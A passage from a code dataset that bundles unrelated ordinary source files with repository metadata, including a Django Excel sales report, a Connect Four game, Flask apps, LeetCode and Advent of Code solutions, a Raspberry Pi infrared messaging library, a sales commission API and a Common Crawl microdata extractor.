to_dict(instance):\n opts = instance._meta\n data = {}\n for f in opts.concrete_fields + opts.many_to_many:\n if isinstance(f, ManyToManyField):\n if instance.pk is None:\n data[f.name] = []\n else:\n data[f.name] = list(f.value_from_object(instance).values_list('pk', flat=True))\n else:\n data[f.name] = f.value_from_object(instance)\n return data\n\n#Nuestra clase hereda de la vista genérica TemplateView\n\nclass ReporteCliente(TemplateView):\n\n def get(self, request, *args, **kwargs):\n #recibo los datos\n fechaini = self.request.GET.get('fechainicial_precio')\n fechafini = self.request.GET.get('fechafinal_precio')\n cliente = self.request.GET.get('cliente_idcliente')\n checo=str(self.request.GET.get('checkbo'))\n\n if not cliente:\n cliente=0\n\n truncate_date = connection.ops.date_trunc_sql('month', 'fecha_venta') #se obtiene solo el mes de la venta\n qs = Venta.objects.extra({'month':truncate_date}) # se añade un nuevo campo/columna que tendrá de nombre \"month\" y tendrá como datos \"truncate_date\" que en este caso es el mes\n fecha1=str(fechaini) #debe ser la fecha más pequeña\n fecha2=str(fechafini) #debe ser la fecha más grande\n fecha1_split=fecha1.split('/')\n fecha2_split=fecha2.split('/')\n\n compras_clientes=qs.values('month','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') #este y funciona con las horas\n pormes=False\n if len(fecha1_split)>1 and len(fecha2_split)>1:\n #fecha1_split=fecha1.split('/')\n #fecha2_split=fecha2.split('/')\n fechainicial_real=datetime.datetime(int(fecha1_split[2]),int(fecha1_split[1]), int(fecha1_split[0]),0,0,0,tzinfo=pytz.UTC)\n fechafinal_real=datetime.datetime(int(fecha2_split[2]),int(fecha2_split[1]), int(fecha2_split[0]),23,59,59,tzinfo=pytz.UTC)\n fechainicial_real=fechainicial_real+datetime.timedelta(hours=6)\n fechafinal_real=fechafinal_real+datetime.timedelta(hours=6)\n if checo==\"true\":\n pormes=True\n compras_clientes = qs.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,cliente_idcliente=int(cliente),fecha_venta__range=(fechainicial_real, fechafinal_real)).values('month','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') #este y funciona con las horas\n if not compras_clientes:\n compras_clientes= qs.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,fecha_venta__range=(fechainicial_real, fechafinal_real)).values('month','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') #este y funciona con las horas\n else:\n compras_clientes = Venta.objects.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,cliente_idcliente=int(cliente),fecha_venta__range=(fechainicial_real, fechafinal_real)).values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('total_ventas')\n if not compras_clientes:\n compras_clientes = Venta.objects.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,fecha_venta__range=(fechainicial_real, fechafinal_real)).values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('total_ventas')\n\n if not compras_clientes:\n compras_clientes=qs.values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','month','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') #este y funciona con las horas\n\n repo_clientes=ValuesQuerySetToDict(compras_clientes)\n\n #Creamos el libro de trabajo\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n ws['B1'] = 'Kadosh'\n ws['B2'] = 'REPORTE DE PRODUCTOS'\n ws['B3'] = datetime.datetime.now()\n\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n ws.merge_cells('B1:E1')\n ws.merge_cells('B2:E2')\n ws.merge_cells('B3:E3')\n #Colores de fuente de celda y tama;os de letras\n ft = Font(color=colors.RED)\n b1 = ws['B1']\n b1.font = ft\n ft2 = Font(color=colors.BLUE)\n b2 = ws['B2']\n b2.font = ft2\n\n #Creamos los encabezados desde la celda B3 hasta la E3\n ws['B5'] = 'Cod'\n ws['C5'] = 'Nit'\n ws['D5'] = 'Nombres'\n ws['E5'] = 'Apellidos'\n ws['F5'] = 'Mes'\n ws['G5'] = 'Compra'\n\n\n cont=6\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for client in repo_clientes:\n if pormes:\n fecha=client['month'].month #strftime('%B')\n ws.cell(row=cont,column=6).value = fecha\n ws.cell(row=cont,column=2).value = client['cliente_idcliente__pk']\n ws.cell(row=cont,column=3).value = client['cliente_idcliente__nit_cliente']\n ws.cell(row=cont,column=4).value = client['cliente_idcliente__persona_idpersona__nombres_persona']\n ws.cell(row=cont,column=5).value = client['cliente_idcliente__persona_idpersona__apellidos_persona']\n ws.cell(row=cont,column=7).value = client['total_ventas']\n\n cont = cont + 1\n\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteClientes.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n","repo_name":"masozow/kadosh","sub_path":"kadoshapp/viewReporteClientesExcel.py","file_name":"viewReporteClientesExcel.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38140024250","text":"from enum import Enum, auto\n\n\nclass InvalidMove(Exception):\n pass\n\n\nclass GameStates(Enum):\n OPEN = auto()\n DRAW = auto()\n PLAYER_1_WIN = auto()\n PLAYER_2_WIN = auto()\n\n\nclass ConnectFourGame:\n def __init__(self, x_size, y_size, player_1='player_1', player_2='player_2'):\n if x_size <= 0 or y_size <= 0:\n raise ValueError(f'x_size and y_size should be a positive integer')\n self._move_history = []\n self._board = [[] for _ in range(x_size)]\n self._player_names = [player_1, player_2]\n self._x_size = x_size\n self._y_size = y_size\n self._game_state = GameStates.OPEN\n self._winning_row = None\n\n def move(self, x_coord, player=None):\n if player is not None and self.current_player() != player:\n raise InvalidMove(f'Not {player}\\'s turn.')\n if self._game_state != GameStates.OPEN:\n raise InvalidMove('Game already closed.')\n if x_coord < 0 or x_coord >= self._x_size:\n raise InvalidMove(f'Invalid x coordinate: {x_coord}.')\n if len(self._board[x_coord]) >= self._y_size:\n raise InvalidMove(f'Column is full: {x_coord}.')\n\n self._move(x_coord)\n\n def current_player(self):\n return self._player_names[self._current_player()]\n\n def last_player(self):\n return self._player_names[1 - self._current_player()]\n\n def get_board(self):\n result = [[None] * self._y_size for _ in range(self._x_size)]\n for x_coord, column in enumerate(self._board):\n for y_coord, occupied_by in enumerate(column):\n result[x_coord][y_coord] = occupied_by\n return result\n\n def occupied_by(self, x_coord, y_coord):\n player = self._occupied_by(x_coord, y_coord)\n if player is None:\n return None\n return self._player_names[player]\n\n def undo(self, player=None):\n if len(self._move_history) == 0:\n raise InvalidMove('No move to undo.')\n if self._game_state != GameStates.OPEN:\n raise InvalidMove('Game already closed.')\n if player is not None and self.last_player() != player:\n raise InvalidMove(f'It is {player}\\'s turn. Undo is not allowed.')\n\n x_coord = self._move_history.pop()\n self._board[x_coord].pop()\n\n def get_state(self):\n return self._game_state\n\n def get_winning_row(self):\n return self._winning_row\n\n def _move(self, x_coord):\n player = self._current_player()\n new_position = (x_coord, len(self._board[x_coord]))\n\n self._move_history.append(x_coord)\n self._board[x_coord].append(player)\n directions = ((-1, 1), (0, 1), (1, 1), (1, 0))\n for direction in directions:\n row = set()\n for step in (direction, tuple(-coord for coord in direction)):\n position = new_position\n while self._occupied_by(*position) == player:\n row.add(position)\n position = tuple(pos_coord + step_coord\n for pos_coord, step_coord in zip(position, step))\n if len(row) >= 4:\n if player == 0:\n self._game_state = GameStates.PLAYER_1_WIN\n else:\n self._game_state = GameStates.PLAYER_2_WIN\n self._winning_row = sorted(row)\n break\n if (self._game_state == GameStates.OPEN and\n len(self._move_history) == self._x_size * self._y_size):\n self._game_state = GameStates.DRAW\n\n def _current_player(self):\n return len(self._move_history) % 2\n\n def _occupied_by(self, x_coord, y_coord):\n if x_coord < 0 or x_coord >= self._x_size:\n return None\n if y_coord < 0 or y_coord >= len(self._board[x_coord]):\n return None\n return self._board[x_coord][y_coord]\n","repo_name":"r7ar7a/connect_four","sub_path":"connect_four/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3405590324","text":"from flask import Flask,render_template,abort,request\napp= Flask(__name__)\n\nimport json\nwith open(\"MSX.json\") as fichero:\n datos=json.load(fichero)\n\n\n@app.route('/',methods=[\"GET\"])\ndef inicio():\n return render_template(\"inicio.html\")\n\n@app.route('/juegos',methods=[\"GET\"])\ndef juegos():\n return render_template(\"buscajuegos.html\")\n\n@app.route('/listajuegos',methods=[\"POST\"])\ndef listajuegos():\n nombre=request.form[\"cadena\"]\n lista_juegos=[]\n for dato in datos:\n if nombre in str(dato[\"nombre\"]):\n lista_juegos.append(dato)\n return render_template(\"listajuegos.html\",datos=lista_juegos,nombre=nombre)\n\n@app.route('/juego/')\ndef juego(id):\n juego=[]\n for dato in datos:\n if id == str(dato[\"id\"]):\n juego.append(dato)\n return render_template(\"juego.html\",datos=juego)\n else:\n return abort(404)\n \n\napp.run(debug=True)","repo_name":"MiguelAsir2/JuegosMSX","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40438774689","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-02 11:13:13\n# @Last Modified time: 2016-10-02 11:16:51\n# @FileName: 53.py\n\n\nclass Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n max_ = nums[0]\n sum_ = 0 \n for i in range(len(nums)): \n if sum_ < 0:\n sum_ = nums[i]\n else:\n sum_ = sum_ + nums[i]\n max_ = max(sum_, max_)\n return max_\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20308603541","text":"from flask import Blueprint, redirect, render_template, request\nfrom utilities.db.products import Product\n\n# catalog blueprint definition\ncatalog = Blueprint('catalog', __name__, static_folder='static',\n static_url_path='/catalog', template_folder='templates')\n\n\n# Routes\n@catalog.route('/catalog')\ndef index():\n cookies = Product.get_cookies()\n packs = Product.get_packs()\n return render_template('catalog.html', cookies=cookies, packs=packs)\n\n\n@catalog.route('/type')\ndef fillter_type():\n packs = Product.get_packs()\n singles = Product.get_cookies()\n type = request.args.get('type')\n if type == 'pack':\n return render_template('catalog.html', cookies=[], packs=packs)\n else:\n return render_template('catalog.html', cookies=singles, packs=[])\n\n\n@catalog.route('/base')\ndef fillter_base():\n selected_base = request.args.get('base')\n print(selected_base)\n cookies = Product.get_cookies_by_base(selected_base)\n return render_template('catalog.html', cookies = cookies, packs = [])\n\n","repo_name":"GititHania/web-project-g22","sub_path":"pages/catalog/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70974269033","text":"import zipfile\nimport os\n\n\n# zip the file in path folder with name filename\ndef zip_file(filename, path):\n f = zipfile.ZipFile(filename, 'w')\n write_zip(f, path)\n f.close()\n\n\n# recursion write folder to zip_file\ndef write_zip(zip_file, path):\n for file in os.listdir(path):\n if os.path.isdir(os.path.join(path, file)):\n zip_file.write(os.path.join(path, file))\n write_zip(zip_file, os.path.join(path, file))\n else:\n zip_file.write(os.path.join(path, file))\n\nif __name__ == '__main__':\n filename = 'c:/users/silcata/desktop/myzip.zip'\n folder = 'c:/users/silcata/desktop/python'\n zip_file(filename, folder)\n","repo_name":"ofedge/python-demo","sub_path":"tools/zip_file.py","file_name":"zip_file.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3345990687","text":"\"\"\"\r\n转移方程: 若 dp[i-1] ≤0 ,说明 dp[i - 1]对 dp[i]产生负贡献,即 dp[i-1] + nums[i]不如 nums[i]本身大。\r\n\r\n当 dp[i - 1] > 0时:执行 dp[i] = dp[i-1] + nums[i] ;\r\n当 dp[i - 1] ≤0 时:执行 dp[i] = nums[i];\r\n\"\"\"\r\nclass Solution:\r\n def maxSubArray(self, nums):\r\n n = len(nums)\r\n dp = [0 for i in range(n)]\r\n dp[0] = nums[0]\r\n for i in range(1, n):\r\n dp[i] = max(nums[i], dp[i-1] + nums[i])\r\n print(dp)\r\n return max(dp)","repo_name":"Hegemony/Python-Practice","sub_path":"剑指 Offer/42. maxSubArray.py","file_name":"42. maxSubArray.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4580428997","text":"BLOCKS = [\n [0, 1, 2, 3],\n [1j, 1, 1 + 1j, 1 + 2j, 2 + 1j],\n [0, 1, 2, 2 + 1j, 2 + 2j],\n [0, 1j, 2j, 3j],\n [0, 1j, 1, 1 + 1j],\n]\n\n\ndef debug(occupied):\n max_y = int(max(c.imag for c in occupied))\n for y in range(max_y, -1, -1):\n for x in range(7):\n print(\"#\" if x + 1j * y in occupied else \".\", end=\"\")\n print()\n\n\ndef can_slide(offset, block, occupied, x, y):\n if not all(0 <= int(round(b.real)) + x + offset < 7 for b in block):\n return False\n for c in occupied:\n if abs(block[0] + x + y * 1j - c) > 5:\n continue\n for b in block:\n if c == b + x + y * 1j + offset:\n return False\n return True\n\n\ndef can_fall(block, occupied, x, y):\n for c in occupied:\n if abs(block[0] + x + y * 1j - c) > 5:\n continue\n for b in block:\n if c == b + x + y * 1j - 1j:\n return False\n return True\n\n\ndef compute_key_first_block(nb_instructions, step, occupied):\n return (\n step % nb_instructions,\n tuple(sorted(occupied, key=lambda c: (c.imag, c.real), reverse=True)),\n )\n\n\ndef fall(instructions, i, step, occupied):\n max_y = int(max(c.imag for c in occupied))\n y = max_y + 4\n x = 2\n block = BLOCKS[i % 5]\n while True:\n offset = 1 if instructions[step % len(instructions)] == \">\" else -1\n step += 1\n if can_slide(offset, block, occupied, x, y):\n x += offset\n if can_fall(block, occupied, x, y):\n y -= 1\n else:\n for b in block:\n occupied.add(b + x + y * 1j)\n return occupied, step\n\n\ndef part_1(input_data):\n instructions = next(input_data)\n occupied = {0, 1, 2, 3, 4, 5, 6}\n step = 0\n for i in range(2022):\n occupied, step = fall(instructions, i, step, occupied)\n max_y = int(max(c.imag for c in occupied))\n to_remove = set()\n for c in occupied:\n if abs(c - max_y * 1j) > 40:\n to_remove.add(c)\n occupied -= to_remove\n return int(max(c.imag for c in occupied))\n\n\ndef part_2(input_data):\n nb_blocks = 1000000000000\n instructions = next(input_data)\n occupied = {0, 1, 2, 3, 4, 5, 6}\n step = 0\n cache = {}\n y_offset = 0\n i = 0\n while i < nb_blocks:\n if i % 100 == 0:\n print(i)\n occupied, step = fall(instructions, i, step, occupied)\n\n if i % 5 > 0:\n i += 1\n continue\n\n max_y = int(max(c.imag for c in occupied))\n if max_y > 200:\n occupied = {\n c - (max_y - 200) * 1j for c in occupied if abs(max_y - c.imag) <= 200\n }\n y_offset += max_y - 200\n\n key = compute_key_first_block(len(instructions), step, occupied)\n if key in cache:\n cycle_len = i - cache[key][\"i\"]\n full_cycles_remaining = (nb_blocks - i) // cycle_len\n delta_y = max_y + y_offset - cache[key][\"max_y\"]\n i += cycle_len * full_cycles_remaining\n y_offset += delta_y * full_cycles_remaining\n\n cache[key] = {\"max_y\": max_y + y_offset, \"i\": i}\n i += 1\n\n return int(max(c.imag for c in occupied)) + y_offset\n","repo_name":"mgesbert/advent","sub_path":"src/2022/algo/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3725159546","text":"def genSubsets(L):\n \"\"\"\n Input: Array -> Array\n produces a new Array with a subset of the elements in L\n \"\"\"\n res = []\n if len(L) == 0:\n return [[]] # list of empty lists\n smaller = genSubsets(L[:-1]) # all subsets without the last element\n extra = L[-1:] # creates a list of just last element\n new = []\n for small in smaller:\n new.append(small+extra)\n \n return smaller+new\n\n#Test\nprint(genSubsets([0,1,2,3]))","repo_name":"iamieht/MITx-6.00.1x","sub_path":"Week6/genSubsets.py","file_name":"genSubsets.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32790305576","text":"import time, queue, sys\nfrom threading import Thread\n\nimport gpiozero\n\n\ndef serialize_message(message):\n return [ord(character) for character in message]\n\n\ndef deserialize_message(ascii_list):\n return \"\".join([chr(num) for num in ascii_list])\n\n\nclass Buffer:\n def __init__(self, size):\n self.size = size\n self.buffer = []\n\n def put(self, item):\n self.buffer.append(item)\n if len(self.buffer) > self.size:\n self.buffer.pop(0)\n\n def value(self):\n current_len = len(self.buffer)\n if current_len == 0:\n return 0\n return sum(self.buffer)/current_len\n\n def length(self):\n return len(self.buffer)\n\n def empty(self):\n self.buffer = []\n\n\nclass IR_Sensor:\n on_threshold = 0.05\n off_threshold = 0.02\n\n def __init__(self, pin_num):\n self.pin_num = pin_num\n self.sensor = gpiozero.InputDevice(pin_num)\n self.raw_q = queue.SimpleQueue()\n self._stop = False\n\n def start(self):\n stop_fn = lambda: self._stop\n self.io_thread = Thread(target=self._stream_input, args=(stop_fn,))\n self.convert_thread = Thread(target=self._convert_input, args=(stop_fn,))\n self.io_thread.start()\n self.convert_thread.start()\n\n def _convert_input(self, stop):\n raw_buffer = Buffer(50)\n value_buffer = Buffer(1000)\n previous_value = 0\n off_iter = 0\n while True:\n if stop():\n break\n raw_value = self.raw_q.get()\n raw_buffer.put(raw_value)\n value = raw_buffer.value()\n if value <= self.off_threshold:\n previous_value = 0\n off_iter += 1\n elif value >= self.on_threshold:\n if previous_value == 0:\n value_buffer.put(1)\n off_iter = 0\n previous_value = 1\n\n if off_iter >= 4000:\n ascii_code = sum(value_buffer.buffer)\n if ascii_code == 0:\n continue\n # print(ascii_code)\n print(deserialize_message([ascii_code]), end='')\n sys.stdout.flush()\n value_buffer.empty()\n off_iter = 0\n\n\n def _stream_input(self, stop):\n while True:\n if stop():\n break\n raw_value = self.sensor.value\n if raw_value == 0:\n value = 1\n else:\n value = 0\n self.raw_q.put(value)\n time.sleep(0.00000001)\n\n def stop(self):\n self._stop = True\n self.convert_thread.join()\n self.io_thread.join()\n self._stop = False\n\n def get(self):\n return self.q.get()\n\n\nclass IR_LED:\n def __init__(self, pin_num):\n self.pin_num = pin_num\n self.LED = gpiozero.LED(pin_num)\n self.LED.off()\n self.blink_interval = 0.0044\n\n def blink(self, n):\n for i in range(n):\n self.LED.on()\n time.sleep(self.blink_interval)\n self.LED.off()\n time.sleep(self.blink_interval*1.2)\n\n def off(self):\n self.LED.off()\n\n def on(self):\n self.LED.on()\n\n def send_msg(self, msg):\n encoded_msg = serialize_message(msg)\n for code in encoded_msg:\n print(f\"sending ascii code: {code}\")\n self.blink(n=code)\n time.sleep(self.blink_interval*150)\n","repo_name":"mauza/rpi-ir-messages-tutorial","sub_path":"src/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27005264298","text":"from datetime import datetime\n\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiExample, OpenApiParameter, extend_schema\nfrom rest_framework.decorators import action\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom dunder_mifflin.core.controller.sale import SaleController\nfrom dunder_mifflin.core.infra.repository.commission_limit import CommissionLimitRepository\nfrom dunder_mifflin.core.infra.repository.sale import SaleRepository\nfrom dunder_mifflin.core.infra.serializers.sale import SaleReadSerializer, SaleWriteSerializer\n\nSALE_EXAMPLE = {\n \"id\": 1,\n \"nfe\": \"123-456-789-1011-1245\",\n \"client\": {\"id\": 1, \"name\": \"Foo\", \"email\": \"foo@bar.com\", \"phone\": \"1234567890\"},\n \"seller\": {\"id\": 1, \"name\": \"Foo\", \"email\": \"foo@bar.com\", \"phone\": \"1234567890\"},\n \"items\": [\n {\n \"id\": 1,\n \"product\": {\n \"id\": 1,\n \"code\": \"Foo\",\n \"description\": \"Foo bar\",\n \"price\": \"10.00\",\n \"commission_percent\": \"10.00\",\n },\n \"quantity\": 10,\n \"created_at\": \"2000-10-31T01:30:00.000-05:00\",\n \"updated_at\": \"2000-10-31T01:30:00.000-05:00\",\n },\n ],\n}\n\n\nclass SaleView(ViewSet):\n repo = SaleRepository()\n commission_repo = CommissionLimitRepository()\n read_serializer = SaleReadSerializer()\n write_serializer = SaleWriteSerializer()\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Listagem de todas as vendas feitas\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def list(self, _: Request):\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n ).list()\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Recuperacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def retrieve(self, _: Request, pk: int):\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n ).retrieve(pk)\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={204: None},\n description=\"Remocao pelo id de uma venda cadastrada\",\n )\n def delete(self, _: Request, pk: int):\n data, status = SaleController(self.repo).delete(pk)\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Recuperacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def create(self, request: Request):\n try:\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n self.write_serializer,\n ).create(request.data)\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Atualizacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def update(self, request: Request, pk: int):\n try:\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n self.write_serializer,\n ).update(request.data, pk)\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n\n @extend_schema(\n parameters=[\n OpenApiParameter(\"from\", OpenApiTypes.DATE, examples=[OpenApiExample(\"Exemplo\", value=\"dd/mm/yyyy\")]),\n OpenApiParameter(\"to\", OpenApiTypes.DATE, examples=[OpenApiExample(\"Exemplo\", value=\"dd/mm/yyyy\")]),\n ],\n responses={200: SaleReadSerializer},\n description=\"Comissao total das vendas de um periodo\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=[\n {\n \"id\": 1,\n \"seller\": \"Foo Bar\",\n \"total_commission\": 1_200_000,\n \"total_quantity\": 100,\n }\n ],\n )\n ],\n )\n @action(methods=[\"GET\"], detail=False)\n def commissions(self, request: Request):\n try:\n start_date = datetime.strptime(\n request.query_params[\"from\"],\n \"%d/%m/%Y\",\n )\n end_date = datetime.strptime(\n request.query_params[\"to\"],\n \"%d/%m/%Y\",\n )\n\n data, status = SaleController(self.repo, commission_repo=self.commission_repo).get_commissions(\n start_date, end_date\n )\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n","repo_name":"devguerreiro/bc-amcom","sub_path":"dunder_mifflin/core/infra/views/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4425818562","text":"import sys\nimport random\n\nfrom PyQt5.QtGui import QPainter, QColor\nfrom PyQt5.QtWidgets import QWidget, QApplication, QPushButton\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(200, 200, 600, 600)\n self.btn = QPushButton('Рисовать', self)\n self.btn.move(10, 10)\n self.btn.clicked.connect(self.paint)\n self.do_paint = False\n\n def paintEvent(self, event):\n if self.do_paint:\n self.btn.hide()\n qp = QPainter()\n qp.begin(self)\n self.draw_flag(qp)\n qp.end()\n\n def paint(self):\n self.do_paint = True\n self.repaint()\n\n def draw_flag(self, qp):\n qp.setBrush(QColor(255, 255, 0))\n for i in range(random.randint(3, 6)):\n x = random.randint(0, 200)\n y = random.randint(100, 300)\n d = random.randint(10, 100)\n x1 = x + d\n y1 = x + d\n qp.drawEllipse(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n ex.show()\n sys.exit(app.exec())","repo_name":"arslan384github/task1","sub_path":"MyCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70148373034","text":"from common_crawl.base import *\nfrom openvenues.extract.soup import *\nfrom openvenues.extract.util import *\n\nlogger = logging.getLogger('microdata_job')\n\npatterns = [\n 'vcard',\n 'itemtype',\n 'typeof',\n 'maps\\.google',\n 'google\\.[^/]+\\/maps',\n '(?:goo\\.gl)/maps',\n 'address',\n 'og:latitude',\n 'og:postal_code',\n 'og:street_address',\n 'business:contact_data:street_address',\n 'business:contact_data:postal_code',\n 'place:location:latitude',\n 'geo\\.position',\n 'icbm',\n 'data-lat',\n 'data-lon',\n 'data-lng',\n 'data-long',\n]\n\ncontains_microdata_regex = re.compile('|'.join(patterns), re.I | re.UNICODE)\n\n\nclass MicrodataJob(CommonCrawlJob):\n valid_charsets = set(['utf-8', 'iso-8859-1', 'latin-1', 'ascii'])\n\n def report_vcard_item(self, item):\n have_latlon = False\n for prop in item.get('properties'):\n propname = prop.get('name')\n if propname == 'street_address':\n self.increment_counter('commoncrawl', 'vcard:street_address')\n elif propname == 'postal_code':\n self.increment_counter('commoncrawl', 'vcard:postal_code')\n elif propname == 'org_name':\n self.increment_counter('commoncrawl', 'vcard:org_name')\n elif propname in ('latitude', 'longitude') and not have_latlon:\n self.increment_counter('commoncrawl', 'vcard:geo')\n have_latlon = True\n\n def report_schema_dot_org_item(self, item):\n have_address = False\n have_latlon = False\n for prop in item.get('properties'):\n if prop.get('name') == 'address' or prop.get('type', '').lower() == 'postaladdress':\n address_props = prop.get('properties', [])\n for aprop in address_props:\n if aprop.get('name', '').lower() == 'streetaddress':\n have_address = True\n elif prop.get('name', '').lower() == 'geo':\n geo_props = prop.get('properties', [])\n for gprop in geo_props:\n if gprop.get('name', '').lower() == 'latitude':\n have_latlon = True\n elif prop.get('name', '').lower() == 'latitude':\n have_latlon = True\n if have_address and have_latlon:\n break\n if have_address:\n self.increment_counter('commoncrawl', 'schema.org:address', 1)\n if have_latlon:\n self.increment_counter('commoncrawl', 'schema.org:geo', 1)\n\n def report_items(self, items):\n self.increment_counter('commoncrawl', 'sites with places', 1)\n for item in items:\n item_type = item.get('item_type')\n if not item_type:\n continue\n elif item_type == VCARD_TYPE:\n self.report_vcard_item(item)\n elif item_type == SCHEMA_DOT_ORG_TYPE:\n self.report_schema_dot_org_item(item)\n else:\n self.increment_counter('commoncrawl', item_type, 1)\n\n def report_social(self, social):\n for k, vals in social.iteritems():\n self.increment_counter('commoncrawl', 'url type {}'.format(k),\n len(vals))\n\n def parse_content(self, content):\n content = br2nl(content)\n return BeautifulSoup(content, 'html.parser')\n\n def filter(self, url, headers, content):\n return contains_microdata_regex.search(content)\n\n def process_html(self, url, headers, content, soup):\n ret = extract_items(soup)\n if not ret:\n return\n items = ret.get('items')\n if items:\n self.report_items(items)\n\n social_handles = ret.get('social')\n if social_handles:\n self.report_social(social_handles)\n\n yield url, ret\n self.increment_counter('commoncrawl', 'filtered records', 1)\n\n\nif __name__ == '__main__':\n MicrodataJob.run()\n","repo_name":"openvenues/openvenues","sub_path":"openvenues/jobs/microdata.py","file_name":"microdata.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"17845973007","text":"from ctypes import ArgumentError\nfrom typing import List, Dict\n\nimport re\nfrom cloudscraper import create_scraper\nfrom bs4 import BeautifulSoup\n\nfrom ArticleParser import ArticleParser\nfrom OpinionsParser import OpinionsParser\n\n\nclass 